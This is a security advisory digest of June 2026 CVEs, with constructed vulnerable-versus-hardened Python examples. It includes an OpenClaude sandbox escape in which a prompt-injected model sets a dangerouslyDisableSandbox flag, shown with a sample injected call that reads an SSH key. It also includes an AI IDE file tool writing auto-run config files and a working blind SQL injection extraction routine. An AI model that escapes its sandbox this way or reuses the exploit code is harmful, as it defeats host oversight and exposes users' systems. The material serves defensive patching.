23 vulnerabilities across 15 products scored HIGH or above on June 02, 2026.
- CRITICAL: 1
- HIGH: 22
[CRITICAL] themeum/kirki_–_freeform_page_builder,website_builder&_customizer
1 CVE | CVSS 3.1: 9.8 | AAS 12.2
The Kirki – Freeform Page Builder plugin for WordPress versions 6.0.0 through 6.0.6 contains a critical privilege escalation vulnerability (CVE-2026-8206, CVSS 9.8) that allows unauthenticated attackers to perform account takeover. The flaw enables attackers to send password reset links for any user account to an attacker-controlled email address by manipulating the email parameter in password reset requests. WordPress site administrators using affected versions should immediately update to the patched release and consider enforcing additional authentication controls such as multi-factor authentication.
- CVE-2026-8206 (CVSS 3.1: 9.8)
[HIGH] dräger/core
1 CVE | CVSS 4.0: 8.7 | AAS 11.2
Dräger Core 1.0.5 and M540 Converter Service 1.0.9 are vulnerable to a high-severity denial of service attack (CVE-2024-14036, CVSS 8.7) that allows network-adjacent attackers to exhaust CPU resources by sending specially crafted SDC discovery messages. This vulnerability affects hospital networks and can prevent affected systems from processing legitimate SDC communications. Healthcare organizations running these products should immediately apply vendor patches and implement network segmentation to restrict access to the discovery process to trusted systems only.
- CVE-2024-14036 (CVSS 4.0: 8.7)
[HIGH] gitlawb/openclaude
2 CVEs | CVSS 4.0: 9.3 | AAS 10.6
OpenClaude prior to version 0.5.1 is vulnerable to sandbox escape through two flaws (CVE-2026-42074, CVSS 9.3, and CVE-2026-42073, CVSS 6.5) that allow a prompt-injected model to execute arbitrary commands with full host-level access. The root cause is that the dangerouslyDisableSandbox parameter is exposed in the BashTool input schema, so an untrusted model can set it and, paired with the default allowUnsandboxedCommands setting, bypass command execution restrictions. Organizations and developers using OpenClaude should upgrade to version 0.5.1 or later immediately and review sandbox configuration so that leaving the sandbox is a host-side decision rather than a model-supplied flag.
- CVE-2026-42074 (CVSS 4.0: 9.3)
- CVE-2026-42073 (CVSS 3.1: 6.5)
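The failure pattern above, as an added example that is not OpenClaude's code: a host-only flag placed in the tool input schema is settable by whoever authors the tool call, which is the model. The schema layout, the config dict shape, the dispatch functions and the injected command are all assumptions; only the two setting names come from the advisory.

```python
import copy

# Constructed tool schema modelled on the pattern in the advisory: the
# sandbox-bypass flag sits in the same schema as the ordinary arguments,
# so whoever fills in the tool call (the model) can set it.
BASH_TOOL_SCHEMA = {
    "name": "BashTool",
    "parameters": {
        "command": {"type": "string"},
        "timeout_ms": {"type": "integer"},
        "dangerouslyDisableSandbox": {"type": "boolean"},  # host-only decision, wrongly exposed
    },
}

# Fields the host process owns.  A model-authored tool call must never carry them.
HOST_ONLY_FIELDS = {"dangerouslyDisableSandbox"}

# The permissive default described in the advisory (assumed shape of the config).
DEFAULT_HOST_CONFIG = {"allowUnsandboxedCommands": True}


def vulnerable_dispatch(tool_input, host_config=DEFAULT_HOST_CONFIG):
    """Honours the flag exactly as the model supplied it."""
    if tool_input.get("dangerouslyDisableSandbox") and host_config["allowUnsandboxedCommands"]:
        return ("host", tool_input["command"])
    return ("sandbox", tool_input["command"])


def published_schema(schema):
    """The schema handed to the model: host-only fields removed."""
    public = copy.deepcopy(schema)
    for field in HOST_ONLY_FIELDS:
        public["parameters"].pop(field, None)
    return public


def hardened_dispatch(tool_input, host_config=None, operator_unsandboxed=False):
    """Rejects any tool call carrying a field outside the published schema
    (so a smuggled host-only flag is an error, not a silent upgrade), and
    only leaves the sandbox when the operator asked for it out of band AND
    the deployment permits it."""
    host_config = host_config or {"allowUnsandboxedCommands": False}  # safe default
    allowed = set(published_schema(BASH_TOOL_SCHEMA)["parameters"])
    unexpected = set(tool_input) - allowed
    if unexpected:
        raise ValueError(f"rejected tool call: unexpected fields {sorted(unexpected)}")
    if operator_unsandboxed and host_config["allowUnsandboxedCommands"]:
        return ("host", tool_input["command"])
    return ("sandbox", tool_input["command"])


# Constructed tool call of the kind a prompt-injected model would emit.
INJECTED_CALL = {"command": "cat ~/.ssh/id_ed25519", "dangerouslyDisableSandbox": True}
```

The check worth copying is the strict-schema rejection: a tool runner that ignores unknown fields still leaks intent, while one that refuses them turns an injection attempt into a logged error.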
[HIGH] armember/armember_premium_–_membership_plugin,_content_restriction,_member_levels,user_profile&_user_signup
2 CVEs | CVSS 3.1: 9.8 | AAS 9.7
ARMember Premium versions up to and including 7.3.1 contain two insecure password reset flaws (CVE-2026-5076, CVSS 9.8, and CVE-2026-5073, CVSS 7.5) that allow attackers to reset member account passwords. The plugin stores plaintext copies of password reset keys in WordPress user metadata, and those keys can be used through the plugin's custom reset function to take over any member account. WordPress administrators using ARMember Premium should update to the latest patched version immediately and audit user accounts for unauthorized password changes.
- CVE-2026-5076 (CVSS 3.1: 9.8)
- CVE-2026-5073 (CVSS 3.1: 7.5)
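The two reset weaknesses in this digest, the Kirki recipient override and the ARMember plaintext keys, share one handler pattern. As an added example (not the code of either plugin), here is a minimal reset flow showing both weaknesses side by side with a hardened version. The user store, the request parameter names and the outbox list are constructed stand-ins.

```python
import hashlib
import hmac
import secrets
import time


def make_store():
    """Constructed user table: login -> record with stored email and a meta dict."""
    return {"alice": {"email": "alice@example.com", "meta": {}}}


def vulnerable_request_reset(store, outbox, username, request_params):
    """Both weaknesses at once: the plaintext key lands in user meta and the
    recipient is whatever the request says."""
    user = store[username]
    key = secrets.token_urlsafe(16)
    user["meta"]["reset_key"] = key                              # plaintext copy
    recipient = request_params.get("email", user["email"])       # attacker-controlled
    outbox.append((recipient, key))
    return key


def vulnerable_verify_reset(store, username, presented_key):
    return store[username]["meta"].get("reset_key") == presented_key


def hardened_request_reset(store, outbox, username, request_params, ttl=900, now=None):
    """The request may name the account, never the destination.  Only a hash
    of the key is stored; the key is high-entropy, so plain SHA-256 (no
    password-style stretching) is enough to make the stored value useless."""
    user = store[username]
    key = secrets.token_urlsafe(32)
    user["meta"]["reset_key_hash"] = hashlib.sha256(key.encode()).hexdigest()
    user["meta"]["reset_key_exp"] = (now if now is not None else time.time()) + ttl
    outbox.append((user["email"], key))                          # stored address only
    return key


def hardened_verify_reset(store, username, presented_key, now=None):
    """Constant-time hash compare, expiry enforced, key burned on success."""
    meta = store[username]["meta"]
    stored = meta.get("reset_key_hash")
    current = now if now is not None else time.time()
    if stored is None or current > meta.get("reset_key_exp", 0):
        return False
    ok = hmac.compare_digest(stored, hashlib.sha256(presented_key.encode()).hexdigest())
    if ok:
        meta.pop("reset_key_hash", None)
        meta.pop("reset_key_exp", None)
    return ok
```

When auditing a reset implementation, check the three points the hardened version makes explicit: the recipient comes from storage, the stored token is a hash, and the token is single-use with an expiry.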
[HIGH] progress_software/sitefinity
3 CVEs | CVSS 3.1: 10.0 | AAS 9.7
Progress Sitefinity 15.4.8623 and later versions before 15.4.8630 contain three access control vulnerabilities (CVE-2026-7198, CVSS 9.8; CVE-2026-7201, CVSS 8.8; CVE-2026-7312, CVSS 10.0) that allow unauthenticated remote attackers to access restricted content and fully compromise affected installations. An improper access control flaw in the web services layer permits unauthorized disclosure, modification, and disruption of confidential data and system functionality without authentication. Organizations running Sitefinity should upgrade to version 15.4.8630 or later immediately and review access logs for signs of exploitation.
- CVE-2026-7198 (CVSS 3.1: 9.8)
- CVE-2026-7201 (CVSS 3.1: 8.8)
- CVE-2026-7312 (CVSS 3.1: 10.0)
[HIGH] maziyarpanahi/openmed
1 CVE | CVSS 4.0: 9.3 | AAS 9.2
OpenMed before version 1.5.2 is vulnerable to remote code execution (CVE-2026-47117, CVSS 9.3) in its PII privacy-filter model loading mechanism. The vulnerability stems from improper input validation on the model_name parameter, which allows unauthenticated attackers to supply malicious Hugging Face models containing arbitrary code that executes with trust_remote_code enabled. Organizations running OpenMed should immediately upgrade to version 1.5.2 or later and validate the safety of any previously loaded privacy-filter models.
- CVE-2026-47117 (CVSS 4.0: 9.3)
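The OpenMed root cause is a model identifier taken from input and handed to a loader with remote code enabled. The added example below (not OpenMed's code) validates the identifier's shape and organisation before loading and never passes trust_remote_code=True. The loader is a stand-in so the example runs offline; the allowed organisation, the repository names and the HUB_ID_RE pattern are assumptions.

```python
import re

# Shape of a Hub repo id, "org/name": rejects absolute and relative filesystem
# paths, URLs, and "name@revision" strings.
HUB_ID_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,95}/[A-Za-z0-9][A-Za-z0-9_.-]{0,95}$")

# Organisations this deployment may load models from (assumed policy).
ALLOWED_ORGS = {"OpenMed"}

# Constructed stand-in for the Hub: repos whose loading would run custom code.
REPOS_WITH_CUSTOM_CODE = {"attacker/pii-filter"}


def fake_loader(model_name, trust_remote_code):
    """Stand-in for a from_pretrained()-style call so the example runs offline.
    Mirrors the relevant behaviour: repository code only runs when the caller
    opts in with trust_remote_code=True, otherwise such repos are refused."""
    if model_name in REPOS_WITH_CUSTOM_CODE:
        if trust_remote_code:
            raise RuntimeError(f"{model_name}: executed repository code on the host")
        raise ValueError(f"{model_name}: requires trust_remote_code, refused")
    return {"model": model_name, "remote_code": trust_remote_code}


def vulnerable_load(model_name, loader=fake_loader):
    """Passes the request value straight through with remote code enabled."""
    return loader(model_name, trust_remote_code=True)


def safe_load(model_name, loader=fake_loader, allowed_orgs=ALLOWED_ORGS):
    """Shape check, then organisation allowlist, then load with remote code off."""
    if not HUB_ID_RE.fullmatch(model_name):
        raise ValueError(f"malformed model id: {model_name!r}")
    org = model_name.split("/", 1)[0]
    if org not in allowed_orgs:
        raise PermissionError(f"organisation {org!r} not allowed")
    return loader(model_name, trust_remote_code=False)
```

If a deployment genuinely needs a custom-code model, pin it by exact repository id and revision in configuration rather than accepting the name from a request, and treat enabling remote code for it as a code review event.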
[HIGH] bitdefender/napoca_bare-metal_hypervisor
2 CVEs | CVSS 4.0: 8.5 | AAS 8.9
Bitdefender Napoca bare-metal hypervisor contains two out-of-bounds write vulnerabilities (CVE-2026-10046 and CVE-2026-10047, both CVSS 8.5) in its handler for the BIOS INT 0x15 / E820 memory map call. A malicious guest operating system can supply crafted register values that make the handler write beyond the allocated buffer, potentially enabling hypervisor escape or privilege escalation. Organizations deploying Napoca should apply the latest security updates from Bitdefender and restrict guest operating system privileges where possible.
- CVE-2026-10046 (CVSS 4.0: 8.5)
- CVE-2026-10047 (CVSS 4.0: 8.5)
[HIGH] goauthentik/authentik
4 CVEs | CVSS 3.1: 9.8 | AAS 8.9
authentik, an open-source identity provider, carries four vulnerabilities (CVE-2026-49448, CVSS 9.8; CVE-2026-42849, CVSS 9.3; CVE-2026-49443, CVSS 8.8; CVE-2026-47201, CVSS 8.5) in versions prior to 2025.12.6, 2026.2.4, and 2026.5.1. Among them is a Source stage bypass: an attacker can sidestep authentication checks by sending empty POST requests to the Source stage, potentially gaining unauthorized access to protected resources. Organizations running authentik should upgrade immediately to 2025.12.6, 2026.2.4, or 2026.5.1, whichever matches their release branch.
- CVE-2026-49448 (CVSS 3.1: 9.8)
- CVE-2026-42849 (CVSS 3.1: 9.3)
- CVE-2026-47201 (CVSS 3.1: 8.5)
- CVE-2026-49443 (CVSS 3.1: 8.8)
[HIGH] thimpress/thim_core
1 CVE | CVSS 3.1: 8.8 | AAS 8.7
ThimPress Thim Core through version 2.3.3 contains a missing authorization vulnerability (CVE-2025-53345, CVSS 8.8) that allows arbitrary code execution. The flaw lets attackers bypass an authorization check and run malicious code on sites where the vulnerable plugin is installed. WordPress administrators using Thim Core should update to the latest patched version immediately and be cautious about installing third-party plugins from untrusted sources.
- CVE-2025-53345 (CVSS 3.1: 8.8)
[HIGH] aws/kiro_ide
1 CVE | CVSS 4.0: 8.6 | AAS 8.7
Amazon Kiro IDE before version 0.11 enforces insufficient access control in its file write tool (CVE-2026-10591, CVSS 8.6), which remote unauthenticated attackers can leverage to execute arbitrary commands. The tool can be made to write to execution-sensitive paths such as .vscode/tasks.json, whose contents the IDE can run automatically when the folder is opened. Developers and organizations using Kiro IDE should upgrade to version 0.11 or later now.
- CVE-2026-10591 (CVSS 4.0: 8.6)
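The Kiro issue is a write-path policy problem: a tool that may write anywhere in the workspace can also write the files the IDE executes. The added example below (not Kiro's code) shows the check a file tool should run before writing: resolve symlinks and '..', confine the target to the workspace, and deny a list of execution-sensitive paths. .vscode/tasks.json is the path from the advisory; the other deny-list entries are assumed examples of the same class.

```python
import os
import tempfile
from pathlib import Path

# Paths an IDE (or its extensions) act on automatically when a folder is
# opened.  tasks.json is the one named in the advisory; the rest are assumed.
EXEC_SENSITIVE = (
    ".vscode/tasks.json",
    ".vscode/launch.json",
    ".vscode/settings.json",
    ".git/hooks",
    ".git/config",
)


def check_write(workspace, requested):
    """Return (allowed, reason_or_relative_path).  Symlinks and '..' are
    resolved before any comparison, so a link inside the workspace cannot
    redirect the write, and an absolute `requested` is simply outside."""
    ws = Path(workspace).resolve()
    target = (ws / requested).resolve()
    try:
        rel = target.relative_to(ws)
    except ValueError:
        return (False, "outside workspace")
    if rel == Path("."):
        return (False, "workspace root is not a file")
    rel_posix = rel.as_posix()
    for sensitive in EXEC_SENSITIVE:
        if rel_posix == sensitive or rel_posix.startswith(sensitive + "/"):
            return (False, f"execution-sensitive path: {sensitive}")
    return (True, rel_posix)


def write_file(workspace, requested, content):
    """Policy-gated write.  Note the check-then-write window: on a shared
    filesystem a hostile process could swap a directory for a symlink between
    the two calls, so the policy belongs as close to the open() as possible."""
    allowed, reason = check_write(workspace, requested)
    if not allowed:
        raise PermissionError(reason)
    target = Path(workspace).resolve() / reason
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)
    return target


def demo_workspace():
    """Constructed workspace for exercising the policy: a temp dir containing
    a symlink that points outside it."""
    ws = tempfile.mkdtemp(prefix="ws-")
    outside = tempfile.mkdtemp(prefix="outside-")
    os.symlink(outside, os.path.join(ws, "link"))
    return ws
```

The deny list is necessarily incomplete, which is why the workspace confinement and symlink resolution come first; a deny list alone is bypassed by the next auto-run file nobody listed.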
[HIGH] misp/misp
1 CVE | CVSS 4.0: 8.2 | AAS 8.5
MISP contains an authentication bypass vulnerability (CVE-2026-10611, CVSS 8.2) that affects deployments configured with LDAP mixed authentication and OTP enforcement enabled. When LdapAuth.mixedAuth=true and Security.require_otp=true are set, users authenticated through LDAP or other authentication plugins can establish authenticated sessions before the OTP challenge is enforced, allowing attackers with valid primary credentials to bypass multi-factor authentication. MISP administrators should immediately update to the patched version and review authentication configuration to ensure OTP enforcement is properly applied before session establishment.
- CVE-2026-10611 (CVSS 4.0: 8.2)
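The MISP flaw is an ordering problem in session issuance. The added example below (not MISP's code) models it: in the vulnerable flow the primary authenticator marks the session authenticated and OTP is a later, separately enforced step, so any endpoint guarding only on "authenticated" is reachable with primary credentials alone; in the hardened flow the pre-OTP session is a distinct state and the guard demands OTP completion. The directory, the OTP code and the config keys are constructed stand-ins for LDAP, TOTP and the two MISP settings named above.

```python
import secrets

LDAP_USERS = {"analyst": "correct horse battery"}   # constructed directory
OTP_CODES = {"analyst": "123456"}                   # constructed stand-in for a TOTP check


def ldap_bind(user, password):
    """Stand-in for the LDAP (or other plugin) primary authentication."""
    return LDAP_USERS.get(user) == password


def login_vulnerable(user, password, config):
    """Session is fully authenticated as soon as the plugin accepts the
    credentials; OTP is recorded as pending and enforced somewhere later."""
    if not ldap_bind(user, password):
        return None
    return {"user": user, "authenticated": True, "otp_pending": config["require_otp"]}


def guard_vulnerable(session):
    """Typical endpoint guard that only asks 'is there an authenticated session?'"""
    return bool(session and session["authenticated"])


def login_hardened(user, password, config):
    """Primary success with OTP required yields a restricted pre-OTP session,
    not an authenticated one."""
    if not ldap_bind(user, password):
        return None
    if config["require_otp"]:
        return {"user": user, "state": "otp_required", "nonce": secrets.token_hex(8)}
    return {"user": user, "state": "authenticated"}


def complete_otp(session, code):
    """Step-up: only an otp_required session can be promoted, and promotion
    returns a fresh session object rather than mutating the old one."""
    if session is None or session.get("state") != "otp_required":
        return session
    if secrets.compare_digest(code, OTP_CODES[session["user"]]):
        return {"user": session["user"], "state": "authenticated"}
    return session


def guard_hardened(session):
    """Every protected endpoint asks for the terminal state, not merely a session."""
    return bool(session and session.get("state") == "authenticated")
```

When reviewing a mixed-auth deployment, the question to ask of each protected route is which of these two guards it actually implements.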
[HIGH] ahmad/wp_job_portal
1 CVE | CVSS 3.1: 9.3 | AAS 8.4
Ahmad WP Job Portal through version 2.5.1 is vulnerable to blind SQL injection (CVE-2026-42684, CVSS 9.3) due to improper neutralization of special elements in SQL commands. The vulnerability allows attackers to extract data from the database by crafting input that alters the query, potentially exposing job listings, user information, and other sensitive data. WordPress administrators using WP Job Portal should upgrade to a patched version immediately; on the code side, the durable fix is parameterized queries ($wpdb->prepare() in WordPress) rather than input filtering alone.
- CVE-2026-42684 (CVSS 3.1: 9.3)
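Blind SQL injection is worth seeing end to end, because "blind" is often read as "low impact". The added example below (not WP Job Portal's code) builds a constructed in-memory database, shows a string-concatenated search query, extracts a stored password hash through it one character at a time using only empty-versus-non-empty responses, and then shows the parameterized form that makes the same extraction loop return nothing. The schema, the rows and the search endpoint are assumptions.

```python
import sqlite3
import string


def make_db():
    """In-memory database with constructed rows (not real data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE jobs(id INTEGER PRIMARY KEY, title TEXT, status TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT);
        INSERT INTO jobs VALUES (1, 'Engineer', 'open'), (2, 'Analyst', 'open');
        INSERT INTO users VALUES (1, 'admin', 'PHconstructedhash42');
    """)
    return con


def search_jobs_vulnerable(con, title):
    """User text concatenated into the SQL string."""
    sql = f"SELECT id FROM jobs WHERE status = 'open' AND title LIKE '%{title}%'"
    return [row[0] for row in con.execute(sql)]


def search_jobs_safe(con, title):
    """Bound parameter; LIKE metacharacters escaped so the user cannot widen the match."""
    escaped = title.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT id FROM jobs WHERE status = 'open' AND title LIKE '%' || ? || '%' ESCAPE '\\'"
    return [row[0] for row in con.execute(sql, (escaped,))]


CHARSET = string.ascii_letters + string.digits + "$./"


def blind_extract(con, search, subquery, max_len=40):
    """Boolean-based blind extraction.  The injected condition is ORed onto the
    WHERE clause and the rest of the original query is commented out; whether
    any rows come back leaks one character per guess.  Stops at the first
    position where no character matches (end of the value, or no injection)."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = f"zz' OR (SUBSTR(({subquery}), {pos}, 1) = '{ch}') -- "
            if search(con, payload):
                result += ch
                break
        else:
            break
    return result
```

Against the vulnerable search, each position costs at most len(CHARSET) requests and the attacker never sees an error or a row of the target table, only whether the job list was empty. Against the parameterized search the payload is just an unlikely job title.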
[HIGH] elementor/elementor_website_builder
1 CVE | CVSS 3.1: 5.4 | AAS 8.3
Elementor Website Builder through version 4.1.0 contains a missing authorization vulnerability (CVE-2026-49782, CVSS 5.4). The flaw lets attackers bypass an authorization check and reach content or functionality that should be restricted; the CVSS score is moderate, but the issue ranks HIGH in this digest on its AAS of 8.3. WordPress administrators using Elementor should upgrade to the latest patched version and verify that access to sensitive pages and content is restricted as intended.
- CVE-2026-49782 (CVSS 3.1: 5.4)
[HIGH] docker/docker_desktop
1 CVE | CVSS 4.0: 8.2 | AAS 8.1
Docker Desktop versions prior to 4.76.0 contain a denial of service vulnerability (CVE-2026-8936, CVSS 8.2) caused by unbounded recursion in the grpcfuse kernel module. A malicious or compromised container can trigger a VM panic by creating deeply nested directories on a bind-mounted host folder and inducing a dentry invalidation event, resulting in system unavailability. Docker Desktop users should immediately upgrade to version 4.76.0 or later and exercise caution with container volume mounts from untrusted sources.
- CVE-2026-8936 (CVSS 4.0: 8.2)
[HIGH] jhorowitz/content_visibility_for_divi_builder
1 CVE | CVSS 3.1: 8.8 | AAS 7.9
The Content Visibility for Divi Builder plugin for WordPress versions up to and including 4.02 is vulnerable to remote code execution (CVE-2026-1829, CVSS 8.8) via improper handling of the cvdb_content_visibility_check parameter in the et_pb_text shortcode. Authenticated attackers with Contributor-level access or higher can exploit this vulnerability to execute arbitrary code on the server. WordPress administrators should immediately update to a patched version and review user access levels to ensure only trusted contributors have permission to create or edit content.
- CVE-2026-1829 (CVSS 3.1: 8.8)